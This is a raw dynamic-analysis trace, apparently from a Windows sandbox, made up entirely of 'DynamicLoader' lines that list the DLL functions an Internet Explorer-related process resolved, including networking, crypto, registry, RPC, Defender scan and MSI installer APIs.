DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: IEUI.dll/WaitMessageEx
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDToProxyStubCLSID
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDToTLBPath
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/PSGetPropertyDescription
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: propsys.dll/PropVariantToString
DynamicLoader: propsys.dll/InitPropVariantFromStringAsVector
DynamicLoader: propsys.dll/PSCoerceToCanonicalValue
DynamicLoader: USP10.dll/ScriptIsComplex
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabledForUrl
DynamicLoader: IEUI.dll/DUserPostEvent
DynamicLoader: IEUI.dll/DeleteHandle
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/BufferedPaintStopAllAnimations
DynamicLoader: UxTheme.dll/BufferedPaintUnInit
DynamicLoader: IEUI.dll/DUserFlushMessages
DynamicLoader: IEUI.dll/DUserFlushDeferredMessages
DynamicLoader: comctl32.dll/ImageList_Destroy
DynamicLoader: ole32.dll/RevokeDragDrop
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: IEUI.dll/DisableContainerHwnd
DynamicLoader: ole32.dll/CoWaitForMultipleHandles
DynamicLoader: comctl32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: comctl32.dll/
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/ImageList_GetImageCount
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: comctl32.dll/ImageList_Write
DynamicLoader: USER32.dll/CharLowerW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: CRYPT32.dll/CryptUnprotectData
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: CRYPTBASE.dll/SystemFunction041
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: USER32.dll/PostQuitMessage
DynamicLoader: comctl32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: USER32.dll/UnregisterClassW
DynamicLoader: RPCRT4.dll/RpcEpUnregister
DynamicLoader: RPCRT4.dll/RpcBindingVectorFree
DynamicLoader: RPCRT4.dll/RpcServerUnregisterIf
DynamicLoader: urlmon.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/SetProcessDEPPolicy
DynamicLoader: USER32.dll/SetProcessDPIAware
DynamicLoader: SHELL32.dll/SetCurrentProcessExplicitAppUserModelID
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: IEFRAME.dll/
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: comctl32.dll/PropertySheetW
DynamicLoader: comctl32.dll/PropertySheetA
DynamicLoader: comdlg32.dll/PageSetupDlgW
DynamicLoader: comdlg32.dll/PrintDlgW
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: IEShims.dll/IEShims_Initialize
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: USER32.dll/SetWindowsHookExW
DynamicLoader: USER32.dll/FindWindowExA
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: ADVAPI32.dll/RegQueryValueA
DynamicLoader: ntdll.dll/LdrRegisterDllNotification
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: kernel32.dll/WerUnregisterMemoryBlock
DynamicLoader: USER32.dll/RegisterWindowMessageW
DynamicLoader: RPCRT4.dll/RpcServerUseProtseqW
DynamicLoader: RPCRT4.dll/RpcServerRegisterIfEx
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: RPCRT4.dll/RpcServerInqBindings
DynamicLoader: RPCRT4.dll/RpcEpRegisterW
DynamicLoader: RPCRT4.dll/RpcServerListen
DynamicLoader: SHELL32.dll/SHGetInstanceExplorer
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: USER32.dll/MsgWaitForMultipleObjectsEx
DynamicLoader: urlmon.dll/
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: ADVAPI32.dll/TraceMessage
DynamicLoader: ADVAPI32.dll/TraceMessageVa
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: sqmapi.dll/SqmGetSession
DynamicLoader: sqmapi.dll/SqmEndSession
DynamicLoader: sqmapi.dll/SqmStartSession
DynamicLoader: sqmapi.dll/SqmStartUpload
DynamicLoader: sqmapi.dll/SqmWaitForUploadComplete
DynamicLoader: sqmapi.dll/SqmSet
DynamicLoader: sqmapi.dll/SqmSetBool
DynamicLoader: sqmapi.dll/SqmSetBits
DynamicLoader: sqmapi.dll/SqmSetString
DynamicLoader: sqmapi.dll/SqmIncrement
DynamicLoader: sqmapi.dll/SqmSetIfMax
DynamicLoader: sqmapi.dll/SqmSetIfMin
DynamicLoader: sqmapi.dll/SqmAddToAverage
DynamicLoader: sqmapi.dll/SqmAddToStreamDWord
DynamicLoader: sqmapi.dll/SqmAddToStreamString
DynamicLoader: sqmapi.dll/SqmSetAppId
DynamicLoader: sqmapi.dll/SqmSetAppVersion
DynamicLoader: sqmapi.dll/SqmSetMachineId
DynamicLoader: sqmapi.dll/SqmSetUserId
DynamicLoader: sqmapi.dll/SqmCreateNewId
DynamicLoader: sqmapi.dll/SqmReadSharedMachineId
DynamicLoader: sqmapi.dll/SqmReadSharedUserId
DynamicLoader: sqmapi.dll/SqmWriteSharedMachineId
DynamicLoader: sqmapi.dll/SqmWriteSharedUserId
DynamicLoader: sqmapi.dll/SqmIsWindowsOptedIn
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PSPropertyBag_WriteStr
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PSPropertyBag_WriteGUID
DynamicLoader: propsys.dll/PSPropertyBag_ReadGUID
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: USER32.dll/PostMessageW
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: WININET.dll/InternetSetOptionW
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ieproxy.dll/DllGetClassObject
DynamicLoader: ieproxy.dll/DllCanUnloadNow
DynamicLoader: SHELL32.dll/SHChangeNotifyRegisterThread
DynamicLoader: comctl32.dll/
DynamicLoader: IEShims.dll/IEShims_SetRedirectRegistryForThread
DynamicLoader: RPCRT4.dll/RpcBindingToStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringBindingParseW
DynamicLoader: RPCRT4.dll/I_RpcBindingInqLocalClientPID
DynamicLoader: RPCRT4.dll/RpcServerInqCallAttributesW
DynamicLoader: RPCRT4.dll/RpcImpersonateClient
DynamicLoader: RPCRT4.dll/RpcRevertToSelf
DynamicLoader: RPCRT4.dll/NdrServerCall2
DynamicLoader: RPCRT4.dll/RpcBindingInqObject
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: urlmon.dll/CreateUri
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: ADVAPI32.dll/AddMandatoryAce
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoW
DynamicLoader: urlmon.dll/CreateURLMonikerEx
DynamicLoader: urlmon.dll/CreateAsyncBindCtxEx
DynamicLoader: urlmon.dll/RegisterBindStatusCallback
DynamicLoader: urlmon.dll/UrlMkGetSessionOption
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: NLAapi.dll/NSPStartup
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: MLANG.dll/
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: comctl32.dll/ImageList_Destroy
DynamicLoader: comctl32.dll/ImageList_LoadImageW
DynamicLoader: comctl32.dll/ImageList_Add
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoExW
DynamicLoader: MLANG.dll/
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoExA
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/IsAppThemed
DynamicLoader: WININET.dll/InternetQueryOptionA
DynamicLoader: GDI32.dll/GetLayout
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: GDI32.dll/GetFontAssocStatus
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/RegisterDragDrop
DynamicLoader: UxTheme.dll/SetWindowTheme
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: GDI32.dll/GetTextExtentExPointWPri
DynamicLoader: urlmon.dll/
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: AcroIEHelper.dll/StubInit
DynamicLoader: AcroIEHelper.dll/StubSetSite
DynamicLoader: AcroIEHelper.dll/StubOnQuit
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: SHLWAPI.dll/PathFileExistsA
DynamicLoader: SHLWAPI.dll/PathFileExistsA
DynamicLoader: SHLWAPI.dll/PathFileExistsA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueA
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: comctl32.dll/ImageList_Create
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/ImageList_AddMasked
DynamicLoader: comctl32.dll/LoadIconWithScaleDown
DynamicLoader: comctl32.dll/ImageList_ReplaceIcon
DynamicLoader: urlmon.dll/RevokeBindStatusCallback
DynamicLoader: urlmon.dll/CreateFormatEnumerator
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: urlmon.dll/CreateIUriBuilder
DynamicLoader: urlmon.dll/IntlPercentEncodeNormalize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USER32.dll/ChangeWindowMessageFilter
DynamicLoader: DWMAPI.DLL/DwmSetWindowAttribute
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USER32.dll/IsWindow
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: UxTheme.dll/BufferedPaintInit
DynamicLoader: UxTheme.dll/BufferedPaintRenderAnimation
DynamicLoader: UxTheme.dll/BeginBufferedAnimation
DynamicLoader: UxTheme.dll/DrawThemeParentBackground
DynamicLoader: UxTheme.dll/EndBufferedAnimation
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabledForUrl
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoA
DynamicLoader: urlmon.dll/CoInternetQueryInfo
DynamicLoader: WININET.dll/CommitUrlCacheEntryA
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/QueryAssociations
DynamicLoader: SHELL32.dll/SHCreateAssociationRegistration
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: samcli.dll/NetUserGetLocalGroups
DynamicLoader: SAMLIB.dll/SamConnect
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: SAMLIB.dll/SamEnumerateDomainsInSamServer
DynamicLoader: SAMLIB.dll/SamLookupDomainInSamServer
DynamicLoader: SAMLIB.dll/SamFreeMemory
DynamicLoader: SAMLIB.dll/SamOpenDomain
DynamicLoader: ADVAPI32.dll/LsaOpenPolicy
DynamicLoader: ADVAPI32.dll/LsaLookupNames2
DynamicLoader: ADVAPI32.dll/LsaClose
DynamicLoader: ADVAPI32.dll/LsaFreeMemory
DynamicLoader: SAMLIB.dll/SamGetAliasMembership
DynamicLoader: SAMLIB.dll/SamLookupIdsInDomain
DynamicLoader: SAMLIB.dll/SamCloseHandle
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabled
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: propsys.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/InitPropVariantFromStringAsVector
DynamicLoader: propsys.dll/PSCoerceToCanonicalValue
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: WININET.dll/InternetCrackUrlA
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: UxTheme.dll/EnableThemeDialogTexture
DynamicLoader: comctl32.dll/RegisterClassNameW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: urlmon.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/BufferedPaintStopAllAnimations
DynamicLoader: UxTheme.dll/BufferedPaintUnInit
DynamicLoader: ole32.dll/RevokeDragDrop
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: IEShims.dll/IEShims_GetOriginatingThreadId
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: urlmon.dll/
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: winshfhc.dll/
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: ADVAPI32.dll/TraceMessage
DynamicLoader: ADVAPI32.dll/TraceMessageVa
DynamicLoader: MPCLIENT.DLL/MpManagerOpen
DynamicLoader: MPCLIENT.DLL/MpHandleClose
DynamicLoader: MPCLIENT.DLL/MpManagerOpen
DynamicLoader: MPCLIENT.DLL/MpFreeMemory
DynamicLoader: MPCLIENT.DLL/MpHandleClose
DynamicLoader: MPCLIENT.DLL/MpScanStart
DynamicLoader: MPCLIENT.DLL/MpScanResult
DynamicLoader: MPCLIENT.DLL/MpFreeMemory
DynamicLoader: MPCLIENT.DLL/MpThreatOpen
DynamicLoader: MPCLIENT.DLL/MpScanStart
DynamicLoader: MPCLIENT.DLL/MpThreatEnumerate
DynamicLoader: MPCLIENT.DLL/MpScanResult
DynamicLoader: MPCLIENT.DLL/MpThreatOpen
DynamicLoader: MPCLIENT.DLL/MpThreatEnumerate
DynamicLoader: MPCLIENT.DLL/MpConfigOpen
DynamicLoader: MPCLIENT.DLL/MpConfigGetValue
DynamicLoader: MPCLIENT.DLL/MpConfigClose
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: propsys.dll/PSPropertyBag_WriteDWORD
DynamicLoader: propsys.dll/PSPropertyBag_ReadDWORD
DynamicLoader: propsys.dll/PSPropertyBag_ReadBSTR
DynamicLoader: propsys.dll/PSPropertyBag_ReadStrAlloc
DynamicLoader: propsys.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: ADVAPI32.dll/CommandLineFromMsiDescriptor
DynamicLoader: msiltcfg.dll/MsiSetInternalUI
DynamicLoader: msiltcfg.dll/MsiConfigureProductExW
DynamicLoader: msiltcfg.dll/MsiProvideComponentFromDescriptorW
DynamicLoader: msiltcfg.dll/MsiDecomposeDescriptorW
DynamicLoader: msiltcfg.dll/MsiGetProductInfoW
DynamicLoader: msiltcfg.dll/MsiAdvertiseScriptW
DynamicLoader: msiltcfg.dll/MsiQueryProductStateW
DynamicLoader: msiltcfg.dll/MsiIsProductElevatedW
DynamicLoader: msiltcfg.dll/MsiReinstallProductW
DynamicLoader: USER32.dll/MsgWaitForMultipleObjects
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetProcessWindowStation
DynamicLoader: USER32.dll/CloseWindowStation
DynamicLoader: USER32.dll/GetUserObjectInformationW
DynamicLoader: msi.dll/MsiDecomposeDescriptorW
DynamicLoader: msi.dll/MsiGetComponentPathW
DynamicLoader: msi.dll/MsiGetProductInfoW
DynamicLoader: msi.dll/MsiProvideComponentFromDescriptorW
DynamicLoader: msi.dll/MsiQueryFeatureStateW
DynamicLoader: msi.dll/MsiQueryFeatureStateFromDescriptorW
DynamicLoader: msi.dll/MsiSetInternalUI
DynamicLoader: msi.dll/MsiAdvertiseScriptW
DynamicLoader: msi.dll/MsiQueryProductStateW
DynamicLoader: msi.dll/MsiIsProductElevatedW
DynamicLoader: msi.dll/MsiReinstallProductW
DynamicLoader: msi.dll/MsiConfigureProductExW
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: SFC.DLL/SfcIsKeyProtected
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: SXS.DLL/CreateAssemblyNameObject
DynamicLoader: SXS.DLL/CreateAssemblyCache
DynamicLoader: SFC.DLL/SfcIsFileProtected
DynamicLoader: SETUPAPI.dll/PnpIsFilePnpDriver
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: apphelp.dll/AllowPermLayer
DynamicLoader: kernel32.dll/BaseIsAppcompatInfrastructureDisabled
DynamicLoader: apphelp.dll/SdbInitDatabase
DynamicLoader: apphelp.dll/SdbGetMatchingExe
DynamicLoader: apphelp.dll/SdbReleaseDatabase
DynamicLoader: MPR.dll/WNetGetConnectionW
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: WININET.dll/SetUrlCacheEntryInfoW
DynamicLoader: USER32.dll/PostQuitMessage
